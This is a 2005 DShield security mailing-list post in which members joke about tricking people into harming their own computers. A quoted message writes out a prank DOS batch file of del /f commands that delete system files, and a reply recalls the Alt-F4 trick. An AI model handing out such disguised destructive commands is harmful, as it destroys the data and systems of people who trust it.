[Dshield] l33t idiots (was Re: Hiding IP's

Willy, Andrew AWilly at eSMIL.net
Mon Aug 22 23:39:07 GMT 2005

Hah.  Reminds of me of people idling in IRC .wav trading channels with this
away message: "Press Alt-F4 for a list of files."  Rarely failed.

Andrew

-----Original Message-----
From: Bo Nordgren [mailto:bo at nordgren.net]
Sent: Monday, August 22, 2005 4:05 AM
To: General DShield Discussion List
Subject: Re: [Dshield] l33t idiots (was Re: Hiding IP's

For you people who remember .bat files might find it funny. The rest of you
should be
ashamed of yourself and read up on DOS.

Basicly it did something like:
#echo off
del /f c:\*.com
del /f c:\*.sys
del /f c:\dos\*.com
del /f c:\dos\*.exe
del /f c:\dos\*.sys

That was more or less it and the nittwitt ran it without checking. I find
that
absolutely all time stupid.

He did try to claim that I hacked his computer and killed it so that he had
to get it
reinstalled and things.
NOTICE OF CONFIDENTIALITY-The information in this email, including
attachments, may be confidential and/or privileged and may contain
confidential health information. This email is intended to be reviewed only
by the individual or organization named as addressee. If you have received
this email in error please notify Scottsdale Medical Imaging, an affiliate
of Southwest Diagnostic Imaging, LTD immediately - by return message to the
sender or to support at esmil.com - and destroy all copies of this message and
any attachments. Please note that any views or opinions presented in this
email are solely those of the author and do not necessarily represent those
of Scottsdale Medical Imaging. Confidential health information is protected
by state and federal law, including, but not limited to, the Health
Insurance Portability and Accountability Act of 1996 and related
regulations.